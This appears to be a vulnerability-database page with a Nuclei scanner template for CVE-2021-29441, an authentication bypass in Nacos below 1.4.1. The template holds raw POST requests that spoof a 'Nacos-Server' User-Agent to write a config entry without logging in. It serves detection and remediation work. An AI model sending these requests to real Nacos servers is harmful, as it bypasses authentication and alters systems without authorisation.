| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for Authentication Bypass by Spoofing in Alibaba Nacos | 25 Jun 202600:29 | – | githubexploit | |
| The vulnerability of the AuthFilter component in the Nacos software platform allows attackers to increase their privileges. | 24 Aug 202100:00 | – | bdu_fstec | |
| CVE-2021-29441 | 25 Aug 202113:22 | – | circl | |
| Nacos 安全漏洞 | 27 Apr 202100:00 | – | cnnvd | |
| CVE-2021-29441 | 27 Apr 202120:20 | – | cve | |
| CVE-2021-29441 Authentication bypass | 27 Apr 202120:20 | – | cvelist | |
| Authentication Bypass | 27 Apr 202120:09 | – | github | |
| Authentication Bypass by Spoofing | 27 Apr 202100:00 | – | gitlab | |
| Authentication Bypass by Spoofing | 27 Apr 202100:00 | – | gitlab | |
| Nacos < 1.4.1 Authentication Bypass (CVE-2021-29441) | 26 Oct 202100:00 | – | nessus |
id: CVE-2021-29441
info:
name: Nacos <1.4.1 - Authentication Bypass
author: dwisiswant0
severity: critical
description: |
This template only works on Nuclei engine prior to version 2.3.3 and version >= 2.3.5.
In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)
Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that
enables Nacos servers to bypass this filter and therefore skip authentication checks.
This mechanism relies on the user-agent HTTP header so it can be easily spoofed.
This issue may allow any user to carry out any administrative tasks on the Nacos server.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data and potential compromise of the Nacos server.
remediation: |
Upgrade Nacos to version 1.4.1 or later to mitigate the authentication bypass vulnerability (CVE-2021-29441).
reference:
- https://securitylab.github.com/advisories/GHSL-2020-325_326-nacos/
- https://github.com/alibaba/nacos/issues/4701
- https://github.com/advisories/GHSA-36hp-jr8h-556f
- https://github.com/alibaba/nacos/pull/4703
- https://github.com/bakery312/Vulhub-Reproduce
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-29441
cwe-id: CWE-290
epss-score: 0.74242
epss-percentile: 0.99426
cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: alibaba
product: nacos
tags: cve2021,cve,nacos,auth-bypass,alibaba,vkev,vuln
http:
- raw:
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Nacos-Server
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 403"
- "status_code_2 == 200"
condition: and
- type: dsl
dsl:
- "contains(body_1, 'Forbidden')"
- "body_2 == 'true'"
condition: and
- type: word
part: header
words:
- "application/json"
# digest: 4a0a0047304502202b2f01e3ca538d3775018008c903a022dda37bbe9097bb34dc52290436f264fc022100db86c9b63922cf296909b9c7332aae3fba41f30c0f32ba51c2aa0cda6d62fd0c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation